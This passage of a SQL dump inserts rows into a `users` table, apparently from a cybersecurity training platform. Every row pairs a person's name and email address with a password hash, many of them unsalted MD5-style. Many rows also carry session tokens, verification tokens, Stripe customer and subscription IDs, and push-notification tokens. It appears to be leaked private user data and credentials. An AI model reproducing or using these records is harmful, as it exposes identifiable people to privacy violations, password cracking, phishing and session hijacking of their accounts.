(260, NULL, 'Priyendu', '2401301156@geetauniversity.edu.in', '$2a$10$mSyWGnD5ksNKIuOMMFmrcOEeilzSiVKir/ugNZB7BPUWhstd.FuJe', 'pro', NULL, 'monthly', 'active', 'sub_1T8HxpL5VKtXn66bbQKuhyeY', 'cus_U6Uo9oFZQo6jDT', 0, NULL, NULL, NULL, NULL, 0, '2026-03-07 11:24:52', 'Priyendu', 'Priy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-07 08:24:52', '2026-04-07 13:20:07', 1, 0, NULL, '18b25fa7e85c390c9617ec156437809bc15b07b97b4541280abb4a7b745d8eba', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(261, NULL, 'Nitesh Sharma', '2409301013@geetauniversity.edu.in', '11cf22191af4e23b4c17ccbdbe6da9f8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-07 11:27:43', '24093010137917cf', 'GU 2024 Batch', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-07 08:27:43', NULL, 1, 0, NULL, '9c004a1737b71c6e7aac5238cee99699bf1e308e6ba5a1f3a84c7244ddd6b631', NULL, 'SIEM', 'NDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(262, NULL, 'Osman Onur', 'osmanonuruyar@gmail.com', '594dade303004a768f7ecd4468aa9382', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-08 21:31:42', 'osmanonuruyar0705db', 'Uyar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-08 18:31:42', NULL, 1, 0, NULL, NULL, '361d8c1bc1725097cf70f887726fc571835a2d87bde704bdf5d7e0d478d676f4', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(263, NULL, 'm.', 'mu642955@gmail.com', '641a5e5c8568d72e17bf3c462470ee4b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 01:30:57', 'mu64295504a810', 'umar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-08 22:30:57', NULL, 1, 0, NULL, NULL, 'b73b55a483d4dddfc6ec5b9142ef8fffe246bf2cf05dea052ec79783a997b680', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(264, NULL, 'Vitor', 'vitorfernandes1993@hotmail.com', 'c0f097a65252036e74efe6cc32ab7371', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 12:41:21', 'vitorfernandes199382505b', 'Fernandes', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 09:41:21', NULL, 1, 0, NULL, NULL, '5cc6d29a247d02bc76f7f151e78a613279f1a776b69a3c4904554786292c6e69', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(265, NULL, 'Lex', 'tau.lexnedry.1713451036499@gmail.com', 'a3567392bb3894898f455e2b380aa720', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 14:10:00', 'tau.lexnedry.17134510364996dfd3b', 'Nedry', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 11:10:00', NULL, 1, 0, NULL, NULL, '7c79e9725d8889b27df031c0f8761bac78a6fffa4b925cf29032f29708800e18', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(266, NULL, 'shriyareddy', 'shriyainala19@gmail.com', 'b2e60ac3db51105a1fa32e1b5d156cf1', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-09 15:09:24', 'shriyainala196c3e04', 'inala', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 12:09:24', NULL, 1, 0, NULL, '882740a98bfe63ccb14a435581ac33ad6e4c9f3a9b609753a1431c2e9eb39c62', '95f3869287a370e37b976289e858a07259b98d3b212c2ca1cd63d5e5ececabba', NULL, NULL, 'ExponentPushToken[xWDdiNBzveaMYaBLITtSds]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(267, NULL, 'Aditya', 'adityakumarbth72@gmail.com', '06aac93cb43cbcbeedb9cd68c4e08ee4', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 22:38:54', 'adityakumarbth72390b1b', 'Raj', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 19:38:54', NULL, 1, 0, NULL, NULL, '91bb817d04c22aa26013a92ebe84a8db555c1968955827e69b48a514e484ef64', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(268, NULL, 'Karl', 'pentesterbach@gmail.com', '45a4dc4bef77efb726330298273d0f91', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 02:49:10', 'pentesterbach5e1c33', 'Nichols', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 23:49:10', NULL, 1, 0, NULL, NULL, 'dc6e7b6335d47dcc7092cd05cd3eecebeb9f7289d6ade1d5dca7c2f1486e2fc7', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(269, NULL, 'DARK', 'dark22dragon0@gmail.com', 'ffca95bde80be3b5fa60a25739fadc88', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 06:37:12', 'dark22dragon0d01669', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 03:37:12', NULL, 1, 0, NULL, NULL, 'c9e22dbdd5abcea51b8cf109ed2da7c9c3d0f026587a716d517b35ea80c3a425', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(270, NULL, 'Ayush', 'dhumalayush2710@gmail.com', '703facadbfde0f1f0666dd380cbf0449', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 07:25:32', 'dhumalayush271046068c', 'Dhumal', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 04:25:32', NULL, 1, 0, NULL, NULL, '16aedbe496af06afa0523d1762799c10d609bd4d3219c9d9ec258bc4ddfda369', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(271, NULL, 'Love', 'chhokerluv@gmail.com', '8fe7983d9325fc68ce87b11777846749', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-10 08:07:59', 'chhokerluve40529', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 05:07:59', NULL, 1, 0, NULL, '14b28d75562862740dec805e35b58328837d3f02c35ba1d44023c29fdffe73c4', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(272, NULL, 'Marium', 'kasykasy0246@gmail.com', '$2a$10$czfNoZntcFTiWM.8qWKjxuxcU3iXC6XG43Q9YJDiLV0n3p1.4RSOG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 14:07:43', 'Marium', 'Tanious', 0, '90dc7535b5ff8fc1a07f7df493e65c7d66468abdd3f85fc631b5a28414081457', NULL, NULL, 0, NULL, NULL, '2026-03-10 11:07:43', NULL, 1, 0, NULL, 'f1abcb9f199428486ed262186b2c3f0f14097408611228c76406da27b3fc701b', NULL, NULL, NULL, 'ExponentPushToken[SeZia1F7W7uzbOfLiUi3M0]', NULL, 0, NULL, 'ios', 0, 1, 0),
(273, NULL, 'Ma', 'madom3630@gmail.com', '$2a$10$t/rStDSZUczfjC4KLttUNO6.686pq9P1MQiVhawZ/o1j59YduJv4q', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 16:55:17', 'Madom', 'Dom', 0, '4b23ee5190aff7094eeda046e87958b1a8e251a9dedca60e636ae1e5cd7728d6', NULL, NULL, 0, NULL, NULL, '2026-03-10 13:55:17', NULL, 1, 0, NULL, '81791ad79b96d7a3a49be23cf2403d2b63a6c54c8ae62d53ed6eadbbde189538', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'android', 0, 1, 0),
(274, NULL, 'naresh', 'nareshboda5624@gmail.com', 'bee7031aa73633bc8dcb5e5b8637ac9b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 23:57:36', 'nareshboda5624ae90fd', 'boda', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 20:57:36', NULL, 1, 0, NULL, NULL, 'b9d344ccf32b51e4b0882bfcb7484844325d411e4e67742d1f9cda6dccf83c96', NULL, NULL, 'ExponentPushToken[6brEGmKgPN9QYn6989wMzt]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(275, NULL, 'ronald', 'Roncamp6233@gmail.com', '$2a$10$oMWHRCfmpJ.fxERY.Y1SIelD76LEHJz49CXZ6C.RuOxeDuzZj5FL6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 05:54:26', 'Ronaldnc623', 'Campbell ', 0, '0a4d37b699f643d9a1786ec6e24c317f3b896bb641dd7670788fa55fe77f4dc4', NULL, NULL, 0, NULL, NULL, '2026-03-11 02:54:26', NULL, 1, 0, NULL, 'd0260c8c64e90bc2d72fc0e0208849cefabd3aa26c8f9f39ef6d2102fcc64c68', NULL, NULL, NULL, 'ExponentPushToken[1NJAakCApkq6RWppHWBpXh]', NULL, 0, NULL, 'ios', 0, 1, 0),
(276, NULL, 'lily', 'Sapwelllily7@gmail.com', '$2a$10$OL7sSZVqhKmyuIlmIgxxMO3A2.wxAf9aeJIhIMBY/0rejhg.8Qnku', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 11:19:32', 'Unknown_unicorn ', 'Sapwell ', 0, 'ee75e0a8d6e66cf7e71655db848b8b4756d0c024f0575246a65411a44f049c7b', NULL, NULL, 0, NULL, NULL, '2026-03-11 08:19:32', NULL, 1, 0, NULL, 'e256f5b57a23917409f77543e3e9e4ce53fc0787859a66c722d0b0708b31fdca', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0);
INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(277, NULL, 'Daniel', 'Daniel.alfredo19550@gmail.com', '$2a$10$RHPBI4VyEgqveYeDd9JOfuDS1XeuruPKJMC7dnN1BiWN7iUpxj6sG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-11 14:43:13', 'Dannealf', 'Alfredo', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 11:43:13', NULL, 1, 0, NULL, '0d880261cf23fe4562c918bec3349050759fd56d7f0744b043b90454e6a25783', NULL, NULL, NULL, 'ExponentPushToken[oDq1Z9K-LGE4wh-NbJGhDp]', NULL, 0, NULL, 'ios', 0, 1, 0),
(278, NULL, 'Shefrin', 'shefreen323@gmail.com', '7acd95e79ead617e39c384e5f237caa7', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 16:28:03', 'shefreen3239a85e0', 'K', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 13:28:03', NULL, 1, 0, NULL, NULL, '25e13c7d7bd27c332ebfb4d4e72fbe6e7cc8bb8a3e495e95bba097cdd7997d29', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(279, NULL, 'Gopi', 'gopioffcial2002@gmail.com', '4bc4f79449a5ccad56fe5f43ac941016', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 16:41:13', 'gopioffcial200286efec', 'S', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 13:41:13', NULL, 1, 0, NULL, NULL, 'c991ddccf8bbe0135a4feba843a1488606a3a60444c6c208c2284b5009262558', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(281, NULL, 'Hayden', 'haydenatchesen555@gmail.com', '143e5a0c4ab4d30a66bffa99c096964f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 01:36:21', 'haydenatchesen555bcec89', 'Atchesen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 22:36:21', NULL, 1, 0, NULL, NULL, '82a068c15318dec36383649ace630e75e45283a10fbbd7e30942149cc8f264de', NULL, NULL, 'ExponentPushToken[T1U57DIjlfjUpLvnYkQRwK]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(282, NULL, 'Екатерина', 'mirniysvet2@gmail.com', '$2a$10$QIi2AbROZMO17l7WDkVoZeLApYArnAocOeUUKCHuSun.nPCIkS7b2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 02:46:33', 'emelyanovakt002cad', 'Емельянова', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 23:46:33', NULL, 1, 0, NULL, '15974088bc981c168fe996515a0fea3e5a8999dcc0d34fc2f11a9b87470de4de', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(283, NULL, 'Ekaterina', 'emelyanovakt@gmail.com', '$2a$10$2Th6tH6.gdrj9obncFqhgeWf2LS523DXwcT/26xxJkxCBjllNjrx2', 'pro', NULL, 'monthly', 'active', 'sub_1T9wmQL5VKtXn66b90LWradv', 'cus_U8DCNq94L9e3QB', 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 02:57:48', 'emlkt', 'Emelyanova', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-03-11 23:57:48', NULL, 1, 0, NULL, '2e38119d4c4e41060f446ce1e0c2c878f7035bf65618d19004fefbd515dd5e1d', NULL, 'TI', 'SIEM', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(284, NULL, 'Ciya', 'ciyalalu.7279@gmail.com', '204564baef2f31233d167d0bc6803b2c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 07:41:54', 'ciyalalu.72791cce81', 'Lalu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 04:41:54', NULL, 1, 0, NULL, NULL, 'bee51da663b4d85088ebe85bd0b49bcca1dd0ea80cd31d750a6198d17c0973e8', NULL, NULL, 'ExponentPushToken[ivcu4mG0dwqsH1hoKIx7rN]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(285, NULL, 'Eva', 'emgq5553@gmail.com', '$2a$10$Zg.GnqqsLtMZUyt20coz/e3O9MvujSysuax939s96auIOcJfVFzbC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 10:19:13', 'evamariiaxx', 'Gonzales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 07:19:13', NULL, 1, 0, NULL, 'f0e72c396742f399da6ca3d34460b526ce38bab1c80a1f5ede8b5c91fd5e2209', '39753090e27e598ed0e4b99039b205623ed002f25bd4ff1e55ba1988fbf22aa8', NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(286, NULL, 'Eva', 'evagonzales706@gmail.com', '454a082002e7ac8d274a29c451a3470b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 10:27:07', 'evagonzales7061374f7', 'Gonzales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 07:27:07', NULL, 1, 0, NULL, '38cd1625e7f1b539ab91971a4f98a1619df88940944e21db5f5d2f81573bff5c', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(287, NULL, 'Nitesh', '2409301028@geetauniversity.edu.in', '$2a$10$CKNeLF/AEn38O9.ttUJQHeobYgneoSOJ349oLA0TLEs7Mzidmi196', 'pro', NULL, 'monthly', 'active', 'sub_1TA4jqL5VKtXn66bIgpAPyEX', 'cus_U8LQaCs9NnP1KV', 0, NULL, NULL, NULL, '2026-04-12 11:37:05', 0, '2026-03-12 11:34:56', 'nitesh_sharma', 'Sharma', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 08:34:56', '2026-04-12 11:37:05', 1, 0, NULL, '39de00c6b68ef16ceffddb28a5c66a0a74977aeed11e971060b4f9c186ff573b', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(288, NULL, 'Bruce', 'Phasookr@gmail.com', '$2a$10$0/Nd289fu9t2ddDV1nfbZ.jRhwoGeXYtztVP84QxsFWL2Cx6IH9kG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 12:30:44', 'Rphasook', 'P', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 09:30:44', NULL, 1, 0, NULL, 'e8e41abb845a2eb1b4ade94350486d368792ff52a07ceffd2be62123d1276cf5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(289, NULL, 'Cordae', 'catchesen@gmail.com', '3e80072769768a5aff5d6388a65a600f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 13:05:41', 'catchesenbcb44e', 'Atchesen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 10:05:41', NULL, 1, 0, NULL, NULL, '59814c07a36fbb4cb3442d21fc9200775ed02085131070839985a00bb9a684a4', NULL, NULL, 'ExponentPushToken[nYJKtKKGJpgTQ-N-5Ay0wS]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(290, NULL, 'Jason', 'jason.allen.lang@gmail.com', 'a4ddc5958106e817b33545910d24818d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-12 16:49:36', 'jason.allen.lang20cfdd', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 13:49:36', NULL, 1, 0, NULL, '67b55dfcaff7245379f2df2b6b2c44983d1988f356c2810548f291813d1bb86d', '26f5068aef412c467faa4c60226c054098c7c14062bbb713683987e254f7e941', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(291, NULL, 'Senih', 'senihgocek@gmail.com', '$2a$10$igchxqktSUB3mQdf.L6lKOH4avKeiOA1BY3oI93z7wn0ATR5u8S7O', 'pro', NULL, 'pro', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-13 03:33:30', 'senihgocek', 'Gocek', 1, '3e77b5887b84f00a1c4caa5d2e651e20ce356bd6827ff5dd612b45ddaf456012', NULL, NULL, 0, NULL, NULL, '2026-03-13 00:33:30', NULL, 1, 0, NULL, 'f8076b13d6ef8a0db6ec6ac64a8bc4a20223c04081de3113c455431bf863995e', NULL, NULL, NULL, 'ExponentPushToken[iSvoBhI_0PWq_fZ2ArPsKF]', NULL, 0, NULL, 'ios', 0, 1, 0),
(292, NULL, 'Jedrzej', 'jedrzejstrokosz@gmail.com', '$2a$10$hXLWCD66D0I/aWQITt1SpO4sXYVC0xqsyGj0ChRm3LT9iPvMy9EVm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-13 12:01:21', 'jj077', 'Strokosz', 0, '583b6a7e8fd5698cb6d891bc6c5baa40052f93a3380ddb49245bae3b03366bde', NULL, NULL, 0, NULL, NULL, '2026-03-13 09:01:21', NULL, 1, 0, NULL, '7fc6d36281d04823350c735e8cc78ad2a578ba10febe69edb3366a6ab34c1ed4', NULL, NULL, NULL, 'ExponentPushToken[ZIvD84DhYQF1BUO2tpbXzL]', NULL, 0, NULL, 'ios', 0, 1, 0),
(294, NULL, 'Aaron', 'notgriefzgg@gmail.com', 'c78628a1ffaf59890202b1b20719373e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-14 07:14:32', 'notgriefzggcf59cb', 'Payne', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 04:14:32', NULL, 1, 0, NULL, NULL, 'd546b1380c238fdd651e5a0a0e79d9d5e8e2f102afaf2eb73d3aff7c2c4d5e0a', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(295, NULL, 'Dante', 'danteellis05@gmail.com', 'd402267de3ffae2f7c28e80c1e74908b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-14 09:24:01', 'danteellis058348b7', 'Ellis', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 06:24:01', NULL, 1, 0, NULL, NULL, 'de8e1f370f61f2f4c60ce33f5a113821a4188ef3da37b4433239c3e22f881dd7', NULL, NULL, 'ExponentPushToken[B4V9R4H3-3jXiJBRhrT8k9]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(296, NULL, 'Dezi', 'afangnikossouherbert@gmail.com', '$2a$10$SzIOwRA6YJGt2EDBpxAds.qJJmPPXR.AGp8pVX.vYbOtAVYd3TiLu', 'normal', '/uploads/296-1773523875731.png', 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-14 19:24:37', 'dezistledger', 'St Ledger', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 16:24:37', NULL, 1, 0, NULL, '36f244f28663e0c029ab6ad38b10ca703561cf1889788fae09306a3aab21c122', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'android', 0, 1, 0),
(297, NULL, 'Sony', 'sonywiratama9800@gmail.com', '27e6af38f73053bb6627bce0d5ccb796', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-14 19:34:43', 'sonywiratama9800cc676c', 'Wiratama', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 16:34:43', NULL, 1, 0, NULL, '1a517ca90dc92269fabfba9115224ceac3b183d210df5742e240cab099a1b91a', 'f3debf0d93672570264ea7ced44979cbdb1e9e683c0ec1e4cb9e43bf2bcb9b93', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(298, NULL, 'Kelechi', 'kelechisamuel58@gmail.com', 'f0a4c3e386fe2ed8bd1c9d508eb48838', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-14 21:38:44', 'kelechisamuel587666de', 'Samuel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 18:38:44', NULL, 1, 0, NULL, '31955a78a638ca15beafdc2dc3e5c937aa32912127aaea78c65d5fa1d8652704', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(299, NULL, 'Mukesh Kumar', 'mukeshkumar.tunikala@gmail.com', 'd99313bc636c9c284ffd5377c890b2fc', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 00:38:03', 'mukeshkumar.tunikala3f3085', 'Tunikala', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 21:38:03', NULL, 1, 0, NULL, NULL, '44210ac9ad0e93ce9d137f8bb9c805d1cb37ecc51805d45461bd8e1b86b41400', NULL, NULL, 'ExponentPushToken[FZiAVXCMeoLIhxoBrUUWxM]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(300, NULL, 'Bx1', 'dfultdfult179@gmail.com', '$2a$10$6OclyDczYXK.bED6KpWuZOYiI.sh9NhRc79W1qgb20ODzFCBF1zUS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-15 02:27:22', 'd3f4ult ', 'Bx1 ', 0, '8ab98b49fe44d6b42b2abc7b7f0449d46b2454e4c06c74d6ee5fa36956eee02b', NULL, NULL, 0, NULL, NULL, '2026-03-14 23:27:22', NULL, 1, 0, NULL, '448f7d40f59b460014360547397b495fbf69d68e11a87fc29097aa2532a2c626', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(301, NULL, 'adel', 'haraga0901@gmail.com', 'f5830a5e3c768a2f1ed5602cff98ecf2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-15 10:46:34', 'haraga0901f3add5', 'adel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 07:46:34', NULL, 1, 0, NULL, NULL, 'b94ddadcd227b35ba9e3c850ca782a5c2d88bcb58e924773f4559d39a290f3b3', NULL, NULL, 'ExponentPushToken[GwrgUiD1VCHMFND-1D7BFT]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(302, NULL, 'Carlos', 'carlo.opoku12@icloud.com', '$2a$10$AFEKwMAZK2B40ItVAT5DIu7EJ4TfoUku/2LYf27a9PdvW44DOM2k.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 13:47:31', 'Carlos ', 'Boateng', 0, 'ac360df14a06f0e843c8a6d1b29b3d02db220c693c3ce847c7975764421e0a84', NULL, NULL, 0, NULL, NULL, '2026-03-15 10:47:31', NULL, 1, 0, NULL, 'c3f50b81673920fd5dcc15def85ed2470dfbf5db34254fc389eff71625dd7fea', NULL, NULL, NULL, 'ExponentPushToken[nokajIEDdf3sgiLz2iCd-v]', NULL, 0, NULL, 'ios', 0, 1, 0),
(303, NULL, 'Arun kumar', 'akarunkumar348@gmail.com', 'deb19d2f2985953b3d4b88661bea3c87', 'pro', NULL, 'monthly', 'active', 'sub_1TBIKoL5VKtXn66bia6phBfg', 'cus_U9bXRfvhWJEkKU', 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 20:12:43', 'akarunkumar3489c1d69', 'G', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 17:12:43', NULL, 1, 0, NULL, 'de4a4e9a7128d5c3bc73a002b45a9e4cf8752857dc99114e26f021b8efc38499', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(304, NULL, 'Carlos', 'villarca@outlook.com', '$2a$10$3cMwns.4MpkgI4qSOWzniewTqLteIDPlGfUJZeRAWSywvcJWHpEQ2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 20:28:04', 'villarc', 'Villar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 17:28:04', NULL, 1, 0, NULL, '05fa4e0aaa0ae57c495f6ec8f857dbb6895783767aecc4f2d46ab486786e1c29', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(305, NULL, 'Karthik', 'karthikandatom@gmail.com', '$2a$10$bJcluuRxIN5NnjYaP/Yf/egycfdatK6ECJwBvDoFDA4m1IIM0wpgi', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 20:51:16', 'At0m', 'K', 0, 'e7b2a22d09cf4f8d6f4e7d0ae97699e2fff4656d47b0a5a5752b53fa8680de4d', NULL, NULL, 0, NULL, NULL, '2026-03-15 17:51:16', NULL, 1, 0, NULL, '65560ec6179667c89a0f7f3571950f5c7224f41ba8bda4f4189ed7b361e8bb28', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(306, NULL, 'Adi', 'adibhaibt000@gmail.com', 'f5621a33b2bc96b2033747f6990b10d3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 21:10:21', 'adibhaibt000623a7c', 'Bhai', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 18:10:21', NULL, 1, 0, NULL, NULL, '264f8aa419fa61db44c5884935c8c5078d7e0b1401eba14f6caaaafff3f3227d', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(307, NULL, 'Shanyo', 'shantaciak@gmail.com', '$2a$10$/WY.gVH3dLvCDS.WZJfLj./yxdA6NKeHTtjEOtiMo6T5IL8lGauaW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 21:38:43', 'staciak ', 'Taciak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 18:38:43', NULL, 1, 0, NULL, '34829590083f7a645d5cd942f9e43731747503e72967efbf7b0c0ff3f764fa4d', NULL, NULL, NULL, 'ExponentPushToken[EBC_h_EluP9eUirsWGLzB8]', NULL, 0, NULL, 'ios', 0, 1, 0),
